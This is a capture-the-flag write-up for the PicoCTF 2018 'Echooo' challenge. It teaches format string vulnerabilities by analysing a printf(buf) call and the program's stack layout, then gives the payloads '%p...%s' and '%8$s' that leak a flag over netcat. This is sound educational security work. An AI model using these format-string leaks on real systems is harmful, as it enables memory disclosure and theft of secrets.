PicoCTF 2018 - Echooo

Note: This article is part of our PicoCTF 2018 BinExp Guide.

Spot the Bug

If you’re sick of the same old buffer overflow, here’s a new one for you. See if you can spot it:

while(1) {
  printf("> ");
  fgets(buf, sizeof(buf), stdin);
  printf(buf);
}

Yeah. That’s it - That’s the bug. We already know fgets is fine, so what’s left? … printf()!

Turns out printf is a powerful little beast, so much so that you mustn’t ever give control of the format string over to the user. This kind of vulnerability is known as a “format string vulnerability” - and it’s more powerful than it first appears.

Strategy

So, how do we turn this printf into something that will print the flag? printf is a variadic function, one of the few in the c standard library, and probably the entire reason that variadic functions are even a thing in c (you don’t see them very often in c code outside of printf/scanf). It takes a “format string”, and then any number of other arguments. The idea is that the format string identifies the number and type of the remaining arguments, allowing printf to print them out.

For instance, if you had a char* variable named “name”, pointing at the string “bob”, and you wrote the code printf("Hello %s!\n", name), it would print the string “Hello bob!\n”. The special token “%s” indicates to printf that the corresponding argument is a char*, and printf knows to “fill in” the token’s spot with the value that the argument points at.

Format strings can get quite complicated, and we needn’t discuss all of them here, but what you need to know is that when printf sees a token, like “%s”, it consumes an argument of a given size (on x86 a char* is 4 bytes), and then interprets that argument in accordance with some understanding about how that argument should be formatted (%s de-references the pointer and starts printing chars one at a time until it hits a null byte).

Now, exactly what happens if you attempt to consume an argument that wasn’t actually passed in (or if you attempt to consume one argument as if it were an argument of an incompatible type)? This is referred to as undefined behavior, which means the compiler doesn’t have to care about that case, is free to assume it can’t happen, and can basically do whatever it wants if it ever does.

In practice, with gcc on an x86 machine, printf will consume arguments by indexing into the stack. It will assume that those arguments were passed in immediately following the parameter for the format string, and interpret that memory as the arguments. The question becomes, what follows the argument for the format string in memory, and how can we use it to print the flag?

The general strategy here will be to analyze the content of the stack immediately before the printf function call, and identify if there is a format string that would allows us to gain knowledge of the flag.

Background Info

First up, let’s see what stack variables there are in our program, and then we’ll look at the assembly and see how the stack is layed out.

char buf[64];
char flag[64];
char *flag_ptr = flag;

FILE *file = fopen("flag.txt", "r");
// ...
fgets(flag, sizeof(flag), file);

Here, we see that in addition to the buffer for the format string, there is also one for the flag. Interestingly, we also see an otherwise unused variable that is set to be a pointer to the flag (HINT HINT WINK WINK - We’ll circle back to that in a bit.)

Now, the stack layout:

mov    ebp,esp
push   ecx ; esp -= 4
sub    esp,0xa4 ; esp -= 0xa4
; ...
; char *flag_ptr = flag;
lea    eax,[ebp-0x4c] ; &flag = ebp-0x4c
mov    DWORD PTR [ebp-0x98],eax ; &flag_ptr = ebp-0x98
; ...
; fgets(flag, sizeof(flag), file);
push   DWORD PTR [ebp-0x90] ; file
push   0x40 ; sizeof(flag)
lea    eax,[ebp-0x4c] ; flag
push   eax
call   8048460 <fgets@plt>
; ...
; printf buf
sub    esp,0xc
lea    eax,[ebp-0x8c] ; &buf = ebp-0x8c
push   eax
call   8048450 <printf@plt>

Let’s make a table of some of the content we know has been reserved on the stack:

Address Content
esp (=ebp-0xa8) -
ebp-0x98 char* flag_ptr
ebp-0x90 FILE* file
ebp-0x8c char buf[64]
ebp-0x4c char flag[64]

Here we see the function reserves 0xa8 bytes on the stack. It practice it seems to reserve everything it needs upfront, setting the baseline stack value to be ebp-0xa8. It then push arguments onto and off-of the stack in order to make function calls, always returning to the baseline level (and maintaining a 16 byte stack alignment for every function call).

Let’s look closer at the stack immediately before the printf call (after the arguments have been pushed, but before the call instruction has executed):

Start End Content
esp esp+3 &buf [4 bytes] (format string)
esp+4 esp+15 alignment padding [12 bytes]
esp+16 = baseline = ebp-0xa8 esp+31 = ebp-0x99 other [16 bytes]
ebp-0x98 ebp-0x95 char* flag_ptr

So, immediately following the format string argument is 12 bytes of alignment padding, 16 bytes of other content, and then the 4 byte pointer to the flag. IE: There are 28 bytes and then a pointer to the flag. Since a pointer is 4 bytes, you could say that if you were to treat everything as pointers, then the 8th pointer following the format string would point to the flag (but the first 7 pointers would probably be junk).

We can now attempt to solve the challenge, but we should note that this is the first binary challenge that doesn’t give us direct access to the binary on the shell server. Our only interface is a socket that accepts I/O (this will become common later on, since if you have access to the binary you could always use something like gdb to force it to reveal its secrets). To solve this challenge, use netcat to connect to the server: nc 2018shell.picoctf.com 34802.

Exploitation

We know that we want the string pointed to by the 8th pointer following the format string. What we could use is a format string like this: “%p%p%p%p%p%p%p - %s”, which will print out the values of the first 7 pointers (they aren’t really pointers, but we’ll treat them as such), and then it will print out the “string” pointed to by the 8th pointer. We wouldn’t want to do something like this: “%s%s%s%s%s%s%s %s” because that would attempt to de-reference the first 7 pointers, and since those “pointers” probably aren’t valid, we could expect the program to crash.

Let’s try it out now:

$ nc 2018shell.picoctf.com 34802
Time to learn about Format Strings!
We will evaluate any format string you give us with printf().
See if you can get the flag!
> %p%p%p%p%p%p%p - %s
0x400xf77005a00x80486470xf7738a740x10xf77104900xffe47454 - picoCTF{===REDACTED===}

>

Yay, our analysis worked! The content of the flag buffer has been dumped and we now know the flag! Head back to the PicoCTF 2018 BinExp Guide to continue with the next challenge.

NOTE: There’s actually a “cleaner” way to solve this challenge if you know that the printf function supports a special POSIX extension to format strings. (IE: it works on most unix-like systems, but not on windows). Using it you can index into a specific printf argument without having to print off everything that precedes it. If you add a “n$” between the ‘%’ and the ‘s’, then it will re-interpret all of the arguments as if they were pointers to strings and then print the value of the nth one. In this case the format string “%8$s” is all that is needed to print only the flag and nothing but the flag. Try it out! We’ll use this trick in a couple upcoming challenges.